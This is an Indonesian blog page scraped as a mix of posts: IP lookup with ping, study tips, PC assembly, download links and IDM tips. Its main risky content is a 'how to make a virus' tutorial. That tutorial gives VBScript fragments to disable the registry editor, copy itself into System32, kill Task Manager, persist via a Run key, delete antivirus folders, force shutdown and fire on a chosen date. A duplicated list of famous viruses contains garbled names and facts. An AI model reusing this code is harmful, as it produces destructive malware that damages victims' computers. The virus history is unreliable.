English French German Spain Italian Dutch Russian Portuguese Japanese Korean Arabic Chinese Simplified
Read more: Alternatif widget google translate untuk blogger ~ Home Design Ideas http://kibagus-homedesign.blogspot.com/2010/05/alternatif-widget-google-translate.html#ixzz16Fhps6fU
script src="http://www.clocklink.com/embed.js">

Selasa, 10 Juli 2012

FOTO SEKOLA

FOTO SEKOLAH

Jumat, 04 Februari 2011

cara melacak Alamat IP komputer

Pernakah anda ingin suatu apa alamat IP suatu web yang sering anda kunjugi?Ada satu cara agar kita bisa tau alamat IP suatu situs/web..

1.cara melacak alamt IP suatu situs

untuk melakukan hal ini tidak diperlukan suatu software khusus cukup menggunakan
fasilitas yang telah disediakan oleh windows.Kita bisa menggunakan Dos.

Caranya
masuk ke comand prompt. anda bisa klik Run-cmd-dan ketikkan ping Nama situs yang ingin dilacak lalu tekan enter.Setelah anda tekan enter,maka akan
tertera alamat IP situs tersebut.
ex: ping rizalsaputra81.blogspot.com - trus tekan enter
maka font berwarna merah adalah alamat Ip web tersebut:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\glouzien>ping rizalsaputra81.blogspot.com

Pinging ghs.l.google.com [74.125.53.121] with 32 bytes of data:

Reply from 74.125.53.121: bytes=32 time=586ms TTL=44
Reply from 74.125.53.121: bytes=32 time=471ms TTL=44
Reply from 74.125.53.121: bytes=32 time=1020ms TTL=44
Reply from 74.125.53.121: bytes=32 time=2200ms TTL=44

Ping statistics for 74.125.53.121:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 471ms, Maximum = 2200ms, Average = 1069ms

2.Melacak lokasi server(real address)

Setelah anda mendapatkan IP address situs tersebut.Andapun bisa mengetahui dimana lokasi negara dan kota situs tersebut berada.Caranya buka ww.domainwhitepages.com.
Lalu masukkan IP address situs tersebut atau alamat situs tersebut.andapun akan mendapatkan informasi lengkap tentang lokasi situs tersebut.

dari tips diatas, semoga kita bisa mengambil manfaat,dan inilah fakta technologi yang harus kita ketahui.

Cara buat virus Langsung

Sebelumnya, berikut ini cara-cara paling gampang untuk membuat virus.
semua hal dibawah ini hanya sebagai penambah pengetahuan kita saja
dan tidak boleh disalah gunakan untuk hal-hal yang bersifat merusak.
Dan saya tidak bertanggung jawab jika itu terjadi. Sekarang kita akan
membahas cara gampang membuat virus pake vbs file.
pertama, berikut ini hal-hal yang wajib kita siapin sebelum membuat virus.
# seperangkat komputer berikut monitor,cpu,mouse,kibor, dll (wajib)
# kita harus menyiapkan sebuah file yang ber-ekstensi vbs (*.vbs)
# secangkir teh anget.
# akan lebih afdoL kalo ditemenin lagu2nya rhcp (aku ngefans ma rhcp)
Untuk eksekusi pertama, yang dilakukan virus biasanya mengubah registry.
Sebenarnya udah aku bahas di blogku ini. tapi nggak papa aku ulangin aja.
biar keliatan resmi . misalnya:
1. mendisable regedit. Yang kita tulis:
On Error Resume Next(perintah ini digunakan pada file vb
supaya kalo ada yang salah bisa dilanjutin kode selanjutnya)
CreateObject(”WScript.Shell”).run “cmd.exe /c reg add hkcusoftware\microsoft\windows\currentversion\policies\system /v
disableregistrytools /t reg_dword /d “”1?” /f”, vbhide
sebenarnya banyak cara untuk mendisable regedit. misalnya kek gini:
CreateObject(”WScript.Shell”).regwriteHKEY_CURRENT_USERsoftware\microsoft\
windows\currentversion\policies\systemdisableregistrytools”, 1, “REG_DWORD”
lalu mengubah registry yang lain. yang nggak aku bahas disini karena
udah pernah aku bahas pada postingan yang lain di blogku ini.
2. mengopikan diri ke direktory lain
CreateObject(”Scripting.FileSystemObject”).
GetFile(WScript.ScriptFullName).Copy “c:\windows\system32\virus.vbs”
Ada juga cara lain dengan kide seperti ini:
On Error Resume Next
createobject(”scripting.filesystemobject”).copyfile wscript.scriptfullname,
createobject(”scripting.filesystemobject”)
.getspecialfolder(1) & “\virus.vbs”
misalnya untuk mengkopikan diri ke direktory C:\WINDOWS\System32
dengan nama virus.vbs
.getspecialfolder(0) digunakan untuk direktory WINDOWS
.getspecialfolder(1) digunakan untuk direktory SYSTEM32 pada windowsXP
.getspecialfolder(2) digunakan untuk direktory Temporary
3.Membunuh proses.
digunakan untuk membunuh proses
(proses adalah program yang sedang berjalan)
misalnya kita akan membunuh proses taskmanager
On Error Resume Next
CreateObject(”WScript.Shell”)
.run “taskkill /f /im taskmgr.exe”, vbhide
4.Menjalankan virus pada saat startup atau saat windows dihidupkan.
menggunakan regedit
On Error Resume Next
CreateObject(”WScript.Shell”).RegWrite “HKEY_LOCAL_MACHINESoftware\Microsoft\Windows\CurrentVersion\Run\virus”
, “c:\windows\system32\virus.vbs”
(menjalankan virus yang berada di direktory c:\windows\system32
dengan nama virus.vbs)
5.Menghapus File / Folder
agar virus yang kita buat tidak banyak menggunakan script bisa di singkat seperti ini:
On Error Resume Next
set hapus = CreateObject(”Scripting.FileSystemObject”)
hapus.DeleteFile “C:\xxx.exe” ‘(menghapus file xxx.exe di direktory C:\)
hapus.DeleteFolder “C:\antivirus” ‘(menghapus folder antivirus di direktory C:\)
6.Merestart Windows
CreateObject(”WScript.Shell”).run “shutdown -r -f -t 60?, vbhide
merestart windows dalam waktu 60 sekon
7.Meng-ShutDown Windows
CreateObject(”WScript.Shell”).run “shutdown -s-f -t 60?, vbhide
mematikan windows dalam waktu 60 sekon yang beda cuman
“shutdown -s-f -t 60?
S = untuk shutdown dan
R = untuk reboot\restart
8. Mengaktifkan Virus Pada Waktu tertentu
If day(now) = 1 and month(now) = 1 and year(now) = 2007 then
‘(masukkan kode virus disini)
End if
‘misalnya kalo mau mengaktifkan pada tanggal 1, bulan 1
‘dan tahun 2012
Ok. Pelajaran bikin virus untuk hari ini saya kira udah cukup.
walaupun udah sering dibahas,, nggak papalah,,,, itung-itung
buat nambahin pengetahuan kita. dan semoga bermanfaat Dari riza hamkary salam

Minggu, 26 Desember 2010

Macam-macam virus dan antivirus untuk menanggulanginya

Agustus 13, 2010 oleh dimas94 4 Komentar



2 Votes


1. Virus : Storm Worm adalah virus yang muncul pada tahun 2006, Storm Worm ini adalah sebuah julukan yang di berikan oleh perusahaan di Finlanddia F-Secure, Strom Worm ini menyebar melalui via email dengan judul “230 dead as storm betters Europe” Storm worm ini adalah sebuah program Trojan House yang dari beberapa versinya dapat membuat menjadi bots atau membuat computer menjadi mengirimkan email spam secara automatic, Worm Storm menyumbang 8% dari seluruh infeksi malware secara global.
Anti virus Yang digunakan : BitDefender Antivirus (www.bitdefender.com)

2. Virus : Leap-A/Oompa- A adalah virus yang menyerang system oprasi Mac Os yang mampu mengirimkan pesan ke semua kontak yang anda miliki pada iChat, virus ini masuk melalui iChat yang berformat JPEG, virus Leap-A atau Oompa- A belum cukup berbahaya tetapi pada zaman ini teryata ada orang yang mampu membuat sebuah virus yang mampu menembus sistem operasi Mac Os meskipun pada Mac Os memiliki konsep security through obscurity yang yakin akan tidak ada virus yang menembus sistemnya.
Anti virus Yang digunakan : Kaspersky Anti-Virus (www.kaspersky.com)

3. Virus : Sasser and Netsky, sasser virus, virus ini mampu melumpuhkan system Window yang mampu dibuatnya sampai tidak bisa melakukan proses ShutDown tanpa pada sumber dayanya atau aliran listriknya di cabut, virus ini tidak menyebar melalui vvia email tetapi bila computer yang terserang virus ini ada koneksi dengan computer yang lain maka virus ini akan berjalan secara otomatis dan computer yang pertamanya tidak terserang virus ini menjadi ikut terserang. Netsky, Netsky adalah virus yang menyebar melalui via email dengan 22 Kb attachment file dan jaringan Windows, bila netsky ini menyerang akan memyebabkan pada system DOS akan mengalami eror. Sasser and Netsky ini di buat oleh seorang anak yang berumur 17 tahun yang bernama Seven Jaschan,
Anti Virus Yang digunakan ; Webroot Antivirus (www.webroot.com)

4. Virus : MyDome (Novarg). MyDome adalah virus yang menyebar melalui via email selai itu MyDome ini menyebar melalui media search engines (seperti Google) virus ini mulai menyebar tanggal 1 february 2004 yang lalu dan menyerang DOS yang kedua virus ini menyebar pada tanggal 12 february 2004, gara – gara MyDome ini tersebar pada search engines SENATOR US CHUCK SCHUMER mengajukan agar secepatnya membuat National Virus Response Center.
Anti Virus Yang digunakan : ESET Nod32 (www.eset.com)

5. Virus : SQL Slammer/Saphire, SQL Slammer/Saphire ini mulai menyebar pada januari 2003 virus ini menyebar cepat melalui internet. Pada 2003 ATM Bank Amerika mengalami crash, dan menyebabkan layanan 911 Seattle hancur dan Continental Airlines membatalkan penerbanggan mereka karena eror checkin dan ticketing,maka virus SQL Slammer/Saphire ini menyebabkan kerugian mencapai $1Miliar.
Anti virus Yang digunakan : AVG Anti-Virus (www.avg.com)

6. Virus : Nimba , Nimba virus ini menyebar pada tahun 2001 dan penyebarannya sangatlah cepat, Nimba virus ini adalah memiliki targen server – server besar dan membuatnya menjadi backdoor ke Os, virus ini cara penyebarannya melalui internet access, menurut TruSecure CTO Peter Tippet Nimba virus ini hanya butuh 22 menit untuk masuk menjadi TOP teen Virus tercanggih.
Anti Virus : Vipre Antivirus + Antispyware (www.vipreantivirus.com)

7. Virus ; Code Red & Code Red II, virus ini muncul pada musim panas 2001, virus ini bertujuan pada saat computer berhubungan dengan White House maka semua computer yang kena virus Code Red & Code Red II ini akan mengaccess ke web di white House secara otomatis dan berbarengan, maka akan menjadi overload atau serangan ke DDoS, Code Red & Code Red II ini menyerang OS Windows 2000 dan NT.
Anti virus : F-Secure Anti-Virus (www.f-secure.com)

8. Virus : The Klez, virus ini baru menyerang pada tahun 2001, The Klez ini menyerang melalui Via Email, Virus ini dapat menggandakan email dan terus mengirimkannya ke semua yang ada pada addres book. The Klez ini juga dapat menyebabkan kumputer anda tidak bisa beroprasi secara normal dan tidak dapat menghentikan anti virus.
Anti Virus : Trend Micro (www.trendmicro.com)

9. Virus : ILOVEYOU adalah Virus yang munculnya dari Filipina yang berbentuk Worm, virus ini menyebar via email, Virus ini dapat membuat file virus ini dan mereplikasi dengan sendirinya, Virus ILOVEYOU ini berjudulkan surat cinta dari pengagum rahasia, Original file nya atau induk dari virus ini adalah LOVE-LETTER- FOR-YOU.TXT. vbs., VBS (Visual Basic Scripting) , pencipta virus ILOVEYOU ini adalah Onel de Guzman dari FILIPINA
Anti Virus : McAfee VirusScan (www.mcafee.com)

10. Virus : Melissa virus ini di buat pada tahun 1999 oleh David L Smith, virus ini menyebar Via email dengan document “Here is that document you asked for, don’t show it to anybodey else.” Bila anda membuka file yang dikirimkan nya ini maka document ini akan menyebar secara otomatis . dan dapat menyebabkan replikasi virus ini secara otomatis mengirimkan document ini ke 50 Top email address yang ada di email anda.
Anti virus : Norton AntiVirus (www.symantec.com)

Macam-macam virus dan antivirus untuk menanggulanginya

Agustus 13, 2010 oleh dimas94 4 Komentar



2 Votes


1. Virus : Storm Worm adalah virus yang muncul pada tahun 2006, Storm Worm ini adalah sebuah julukan yang di berikan oleh perusahaan di Finlanddia F-Secure, Strom Worm ini menyebar melalui via email dengan judul “230 dead as storm betters Europe” Storm worm ini adalah sebuah program Trojan House yang dari beberapa versinya dapat membuat menjadi bots atau membuat computer menjadi mengirimkan email spam secara automatic, Worm Storm menyumbang 8% dari seluruh infeksi malware secara global.
Anti virus Yang digunakan : BitDefender Antivirus (www.bitdefender.com)
2. Virus : Leap-A/Oompa- A adalah virus yang menyerang system oprasi Mac Os yang mampu mengirimkan pesan ke semua kontak yang anda miliki pada iChat, virus ini masuk melalui iChat yang berformat JPEG, virus Leap-A atau Oompa- A belum cukup berbahaya tetapi pada zaman ini teryata ada orang yang mampu membuat sebuah virus yang mampu menembus sistem operasi Mac Os meskipun pada Mac Os memiliki konsep security through obscurity yang yakin akan tidak ada virus yang menembus sistemnya.
Anti virus Yang digunakan : Kaspersky Anti-Virus (www.kaspersky.com)
3. Virus : Sasser and Netsky, sasser virus, virus ini mampu melumpuhkan system Window yang mampu dibuatnya sampai tidak bisa melakukan proses ShutDown tanpa pada sumber dayanya atau aliran listriknya di cabut, virus ini tidak menyebar melalui vvia email tetapi bila computer yang terserang virus ini ada koneksi dengan computer yang lain maka virus ini akan berjalan secara otomatis dan computer yang pertamanya tidak terserang virus ini menjadi ikut terserang. Netsky, Netsky adalah virus yang menyebar melalui via email dengan 22 Kb attachment file dan jaringan Windows, bila netsky ini menyerang akan memyebabkan pada system DOS akan mengalami eror. Sasser and Netsky ini di buat oleh seorang anak yang berumur 17 tahun yang bernama Seven Jaschan,
Anti Virus Yang digunakan ; Webroot Antivirus (www.webroot.com)
4. Virus : MyDome (Novarg). MyDome adalah virus yang menyebar melalui via email selai itu MyDome ini menyebar melalui media search engines (seperti Google) virus ini mulai menyebar tanggal 1 february 2004 yang lalu dan menyerang DOS yang kedua virus ini menyebar pada tanggal 12 february 2004, gara – gara MyDome ini tersebar pada search engines SENATOR US CHUCK SCHUMER mengajukan agar secepatnya membuat National Virus Response Center.
Anti Virus Yang digunakan : ESET Nod32 (www.eset.com)
5. Virus : SQL Slammer/Saphire, SQL Slammer/Saphire ini mulai menyebar pada januari 2003 virus ini menyebar cepat melalui internet. Pada 2003 ATM Bank Amerika mengalami crash, dan menyebabkan layanan 911 Seattle hancur dan Continental Airlines membatalkan penerbanggan mereka karena eror checkin dan ticketing,maka virus SQL Slammer/Saphire ini menyebabkan kerugian mencapai $1Miliar.
Anti virus Yang digunakan : AVG Anti-Virus (www.avg.com)
6. Virus : Nimba , Nimba virus ini menyebar pada tahun 2001 dan penyebarannya sangatlah cepat, Nimba virus ini adalah memiliki targen server – server besar dan membuatnya menjadi backdoor ke Os, virus ini cara penyebarannya melalui internet access, menurut TruSecure CTO Peter Tippet Nimba virus ini hanya butuh 22 menit untuk masuk menjadi TOP teen Virus tercanggih.
Anti Virus : Vipre Antivirus + Antispyware (www.vipreantivirus.com)
7. Virus ; Code Red & Code Red II, virus ini muncul pada musim panas 2001, virus ini bertujuan pada saat computer berhubungan dengan White House maka semua computer yang kena virus Code Red & Code Red II ini akan mengaccess ke web di white House secara otomatis dan berbarengan, maka akan menjadi overload atau serangan ke DDoS, Code Red & Code Red II ini menyerang OS Windows 2000 dan NT.
Anti virus : F-Secure Anti-Virus (www.f-secure.com)
8. Virus : The Klez, virus ini baru menyerang pada tahun 2001, The Klez ini menyerang melalui Via Email, Virus ini dapat menggandakan email dan terus mengirimkannya ke semua yang ada pada addres book. The Klez ini juga dapat menyebabkan kumputer anda tidak bisa beroprasi secara normal dan tidak dapat menghentikan anti virus.
Anti Virus : Trend Micro (www.trendmicro.com)
9. Virus : ILOVEYOU adalah Virus yang munculnya dari Filipina yang berbentuk Worm, virus ini menyebar via email, Virus ini dapat membuat file virus ini dan mereplikasi dengan sendirinya, Virus ILOVEYOU ini berjudulkan surat cinta dari pengagum rahasia, Original file nya atau induk dari virus ini adalah LOVE-LETTER- FOR-YOU.TXT. vbs., VBS (Visual Basic Scripting) , pencipta virus ILOVEYOU ini adalah Onel de Guzman dari FILIPINA
Anti Virus : McAfee VirusScan (www.mcafee.com)
10. Virus : Melissa virus ini di buat pada tahun 1999 oleh David L Smith, virus ini menyebar Via email dengan document “Here is that document you asked for, don’t show it to anybodey else.” Bila anda membuka file yang dikirimkan nya ini maka document ini akan menyebar secara otomatis . dan dapat menyebabkan replikasi virus ini secara otomatis mengirimkan document ini ke 50 Top email address yang ada di email anda.
Anti virus : Norton AntiVirus (www.symantec.com)

Tips Dan Trik Cara Belajar Yang Baik Untuk Ujian / Ulangan Pelajaran Sekolah Bagi Siswa SD, SMP, SMA Serta Mahasiswa

Sun, 06/05/2007 - 10:48pm — godam64
Belajar merupakan hal yang wajib dilakukan oleh para pelajar dan mahasiswa. Belajar pada umumnya dilakukan di sekolah ketika jam pelajaran berlangsung dibimbing oleh Bapak atau Ibu Guru. Belajar yang baik juga dilakukan di rumah baik dengan maupun tanpa pr / pekerjaan rumah. Belajar yang dilakukan secara terburu-buru akibat dikejar-kejar waktu memiliki dampak yang tidak baik.
Berikut ini adalah tips dan triks yang dapat menjadi masukan berharga dalam mempersiapkan diri dalam menghadapi ulangan atau ujian :
1. Belajar Kelompok
Belajar kelompok dapat menjadi kegiatan belajar menjadi lebih menyenangkan karena ditemani oleh teman dan berada di rumah sendiri sehingga dapat lebih santai. Namun sebaiknya tetap didampingi oleh orang dewasa seperti kakak, paman, bibi atau orang tua agar belajar tidak berubah menjadi bermain. Belajar kelompok ada baiknya mengajak teman yang pandai dan rajin belajar agar yang tidak pandai jadi ketularan pintar. Dalam belajar kelompok kegiatannya adalah membahas pelajaran yang belum dipahami oleh semua atau sebagian kelompok belajar baik yang sudah dijelaskan guru maupun belum dijelaskan guru.
2. Rajin Membuat Catatan Intisari Pelajaran
Bagian-bagian penting dari pelajaran sebaiknya dibuat catatan di kertas atau buku kecil yang dapat dibawa kemana-mana sehingga dapat dibaca di mana pun kita berada. Namun catatan tersebut jangan dijadikan media mencontek karena dapat merugikan kita sendiri.
3. Membuat Perencanaan Yang Baik
Untuk mencapai suatu tujuan biasanya diiringi oleh rencana yang baik. Oleh karena itu ada baiknya kita membuat rencana belajar dan rencana pencapaian nilai untuk mengetahui apakah kegiatan belajar yang kita lakukan telah maksimal atau perlu ditingkatkan. Sesuaikan target pencapaian dengan kemampuan yang kita miliki. Jangan menargetkan yang yang nomor satu jika saat ini kita masih di luar 10 besar di kelas. Buat rencana belajar yang diprioritaskan pada mata pelajaran yang lemah. Buatlah jadwal belajar yang baik.
4. Disiplin Dalam Belajar
Apabila kita telah membuat jadwal belajar maka harus dijalankan dengan baik. Contohnya seperti belajar tepat waktu dan serius tidak sambil main-main dengan konsentrasi penuh. Jika waktu makan, mandi, ibadah, dan sebagainya telah tiba maka jangan ditunda-tunda lagi. Lanjutkan belajar setelah melakukan kegiatan tersebut jika waktu belajar belum usai. Bermain dengan teman atau game dapat merusak konsentrasi belajar. Sebaiknya kegiatan bermain juga dijadwalkan dengan waktu yang cukup panjang namun tidak melelahkan jika dilakukan sebelum waktu belajar. Jika bermain video game sebaiknya pilih game yang mendidik dan tidak menimbulkan rasa penasaran yang tinggi ataupun rasa kekesalan yang tinggi jika kalah.
5. Menjadi Aktif Bertanya dan Ditanya
Jika ada hal yang belum jelas, maka tanyakan kepada guru, teman atau orang tua. Jika kita bertanya biasanya kita akan ingat jawabannya. Jika bertanya, bertanyalah secukupnya dan jangan bersifat menguji orang yang kita tanya. Tawarkanlah pada teman untuk bertanya kepada kita hal-hal yang belum dia pahami. Semakin banyak ditanya maka kita dapat semakin ingat dengan jawaban dan apabila kita juga tidak tahu jawaban yang benar, maka kita dapat membahasnya bersama-sama dengan teman. Selain itu
6. Belajar Dengan Serius dan Tekun
Ketika belajar di kelas dengarkan dan catat apa yang guru jelaskan. Catat yang penting karena bisa saja hal tersebut tidak ada di buku dan nanti akan keluar saat ulangan atau ujian. Ketika waktu luang baca kembali catatan yang telah dibuat tadi dan hapalkan sambil dimengerti. Jika kita sudah merasa mantap dengan suatu pelajaran maka ujilah diri sendiri dengan soal-soal. Setelah soal dikerjakan periksa jawaban dengan kunci jawaban. Pelajari kembali soal-soal yang salah dijawab.
7. Hindari Belajar Berlebihan
Jika waktu ujian atau ulangan sudah dekat biasanya kita akan panik jika belum siap. Jalan pintas yang sering dilakukan oleh pelajar yang belum siap adalah dengan belajar hingga larut malam / begadang atau membuat contekan. Sebaiknya ketika akan ujian tetap tidur tepat waktu karena jika bergadang semalaman akan membawa dampak yang buruk bagi kesehatan, terutama bagi anak-anak.
8. Jujur Dalam Mengerjakan Ulangan Dan Ujian
Hindari mencontek ketika sedang mengerjakan soal ulangan atau ujian. Mencontek dapat membuat sifat kita curang dan pembohong. Kebohongan bagaimanapun juga tidak dapat ditutup-tutupi terus-menerus dan cenderung untuk melakukan kebohongan selanjutnya untuk menutupi kebohongan selanjutnya. Anggaplah dengan nyontek pasti akan ketahuan guru dan memiliki masa depan sebagai penjahat apabila kita melakukan kecurangan.
Semoga tips cara belajar yang benar ini dapat memberikan manfaat untuk kita semua, amin.

TIPA DAN TRIK CARA BELAJAR MERAKIT KOMPUTER SENDIRI BAGI PEMULA.

Jangan Hubungkan/Nyalakan listrik sebelum semua terpasang dengan baik
Step 1. Pemasangan CPU and CPU Cooler.
1.1. Pemasangan Intel Pentium 4 LGA775 CPU.
1.1.A. Pasang processor pada lubang yang ada dengan sangat hati-hati
1.2. Pemasangan CPU Cooler.

1.2.A. Pasang CPU Cooler di atas processor dengan pengait yang telah ada.

1.2.B. Hubungkan CPU cooler power ke CPU_FAN connector pada motherboard untuk mencegah CPU overheating. (Panas yang tinggi pada motherboard)
Step 2. Pemasangan Memory.

2.1. Pastikan memory cocok/dapat digunakan pada motherboardnya.
2.2. Pemasangan memory satu arah, jadi tidak mungkin terbalik, pasanglah dengan hati-hati.
Step 3. Pemasangan Motherboard.

3.1. Buka salah satu tutup casing
3.2. Buka plat yang ada di bagian belakang, sehingga mother boardnya bisa dipasang.
3.3. Pasang motherboard dengan baik dan jangan lupa ada baut yang harus di pasang
Step 4. Pemasangan IDE/SATA/FDD devices.

4.1. Pemasangan Optical Drives-DVD-ROM/CD-ROM.
4.1.1. Buka cover casing bagian depan.4.1.2. Buka plastik berukuran 5.25″ di depan casing.
4.1.3. Masukkan dan pasang optical drive, jangan lupa dibaut.
4.2. Pemasangan Floppy Disk Drive.
4.2.1. Pasang FDD ke slot dan dibaut
4.3. Pemasangan IDE and SATA Hard Drives

4.3.1. Pasang hard drive di dalam casing dan jangan lupa dibaut.
Step 5. Persiapan dan Pemasangan Power Supply.

5.1. Buka kedua sisi casing dan pasang power supply pada tempatnya.
5.2. Kencangkan power supply dengan baut.
Sebaiknya gunakan power supply berukuran 300W atau lebih. Jika arus listrik kurang bisa menyebabkan kerja system tidak stabil.
Step 6. Pemasangan Expansion Card.

6.1. Gunakan expansion card yang cocok dengan motherboard.
6.2. Buka plat, lalu masukkan expansion card.
6.3. Pasanglah expansion card (ditekan sampai benar-benar masuk) lalu dibaut
Step 7. Pemasangan Kabel dan Power Connector.

–ATX power connector : hubungkan dengan ATX connector pada motherboard.

–ATX_12V power connector : hubungkan dengan ATX_12V pada motherboard.

–IDE power connector : hubungkan dengan IDE device.

–FDD power connector : hubungkan dengan FDD device.
–SATA power connector : hubungkan dengan SATA device.
—-7.2. Hubungkan power supply sesuai pasangannya. (seperti contoh gambar di atas).
—-7.3. Pasang kembali masing-masing casing, lalu dibaut.
Notes :
1. Kabel power connectors dan audio connectors dirancang hanya bisa digunakan untuk satu arah.
2. Setelah IDE/SATA hard dipasang, masukkan BIOS dan lakukan penyetingan.
Step 8. Connecting the Front Panel Header.

FP PWR/SLP : Message/Power/Sleep LED.
PWR_SW_P/N : Power Switch.
HD_LED_P/N : IDE Hard Drive Activity LED
RST_SW-P/N : Reset Switch
Step 9. Pemasangan Ports pada casing.
Tampilan port pada casing.

Tampilan tidak sama pada masing-masing casing.
Setelah semua dipasang, lalu hubungkan keyboard, mouse, monitor, dll. Nyalakan komputer dan install software systemnya.
http://www.pipos.co.cc/2009/04/tips-dan-trick-cara-belajar-merakit.html
Diposkan oleh Noni Dhajo di 05.13
Kirimkan Ini lewat Email BlogThis! Berbagi ke Twitter Berbagi ke Facebook Berbagi ke Google Buzz
Reaksi:
1 komentar:

Bek-Tim Electronik mengatakan...
slm kenal.Mba'Non kasih Infm.cara sofewhare.juga dong pembaca yg lain pasti perlu juga..!!! itung2 bg ilmu.sy juga nungguin. soalnya udah lupa ?apalagi skrng beda..Tank's seblmnya
29 Januari 2010 00.57
Poskan Komentar

Link ke posting ini

Download


ANTIVIRUS

Avira AntiVir Personal – Free Antivirus 10.0.0.567 klik disini

Norton AntiVirus 2008 15.5.0.23 klik disini

BitDefender Mobile Antivirus 2008 2.1.132 klik disini

Rising Antivirus Free Edition 22.00.04.53 klik disini

NOD32 Antivirus 4.2.58 klik disini

AVG Anti-Virus Free Edition 9.0 Build 851a3009 klik disini

Kaspersky Anti-Virus 2011 11.0.1.400 klik disini

USB Disk Security 5.3.0.36 klik disini

WEB BROWSER

Internet Explorer 9 Platform Preview 4.0 klik disini

Google Chrome Canary/6Dev/5.0.375.126 klik disini

Opera Mini 4.2.13918 klik disini

Firefox 4.0Beta3/3.7Alpha5/3.6.8 klik disini

Opera 10.70.3483 Dev/10.61 RC3 klik disini

Opera Mobile 9.52 klik disini

Flock 3.0 Beta / 2.6.1 klik disini

CHAT

Skype 5.0.0.105 Beta/4.2.32.163 klik disini

Yahoo Messenger Monitor Sniffer 3.2 klik disini

MSN Messenger For Windows 98 Me 7.0 klik disini

MSN Messenger 6.2 klik disini

MSN Messenger 7.5 klik disini

mIRC 7.1c klik disini

Vypress Chat 2.1.8 klik disini

powChat 1.0 klik disini

Facebook Desktop 1.0b klik disini

Media Player

CyberLink_PowerDVD_40428.exe klik disini

VLC Media Player klik disini

tips mempercantik blog

Text

IDM

Kali nie diriku mo bagi2 tips buat download file secara berantai,pertama buka situs yang memiliki file yang dapat diakses/didownload secara langsung [direct download] seperti misalnya situs ftp repository file puppy linux berikut, untuk mengetahui file yang ada itu direct download atau bukan cukup mudah, tinggal arahkan kursor mouse ke sebuah file, jika dibagian bawah kiri browser muncul url lengkap sampai jenis/ekstensi file maka link tersebut merupakan link direct download.

Note : untuk menjalankan tips berikut diperlukan IDM yang telah ter-install dan terintegrasi dengan browser tertentu, contohnya punyaku pakai IDM 5.18 yang terintegrasi dengan Firefox 3.6

Nah kalau sudah ada kumpulan file yang mau didownload tinggal klik kanan disembarang tempat di browser lalu pilih pilihan yang paling bawah, yaitu ‘Download all links with IDM’ maka selanjutnya akan muncul jendela baru.

Di jendela yang baru nie yang penting beri centang list file yang pingin di-download, lalu tentukan lokasi penyimpanannya, terakhir beri centang pada pilihan sebelah kanan seperti yang ku-contohkan untuk menghide [menyembunyikan] file yang tidak penting untuk di-download seperti misal file html, js dan sebagainya.

Kalau sudah tinggal klik OK aja dan otomatis list file2 tersebut akan masuk dalam main download queue di IDM. Ada baiknya kita buatkan queue sendiri seperti yang ada dalam SS yang ku-contohkan.

Berkutnya kita akan mengatur sedikit ketentuan download, klik tombol Scheduler maka kita akan dibawa ke jendela berikut :

Dijendela tersebut, pilih salah satu queue, misal kalau diriku ya pilih queue Puppy Repository 4 2009, kalau belum buat queue ya pilih aja Main download queue, lalu klik tab Files in the queue, dan pada kolom ‘Download … files at the same time‘ isi aja seterah sesuai bandwidth yang temen-temen punya, misal diriku punya bandwidth 100Kbps kuatur aja agar IDM memproses 20 download file dalam sekali waktu, jadi tiap file dapet speed 5Kbps. Yah soalnya file-file yang ku-download kecil-kecil jadi speed 5Kbps aja udah cukup.

Terakhir tinggal kembali ke menu awal IDM, lalu masuk menu Downloads >> Speed Limiter >> Setting dan atur batas maksimal kecepatan download per file, punyaku kuatur 10 Kbps biar pada tarik2an pada kisaran 10Kbps.

Nie contoh download progress-ku tadi :

Maklum lah bandwidth dikit dibagi banyak, ya gitu deh hasilnya. lol

Oh iya nie tambahan SS kalau tips nie juga bisa digunakan bwt download file gambar yg sifatnya juga direct download, daripada klik kanan Save As per file kan cape’.

Yah walau ga’ gitu bagus kuharap tips kali nie bisa bermanfaat buat temen-temen.

sponsor

Twitter Delicious Facebook Digg Stumbleupon Favorites More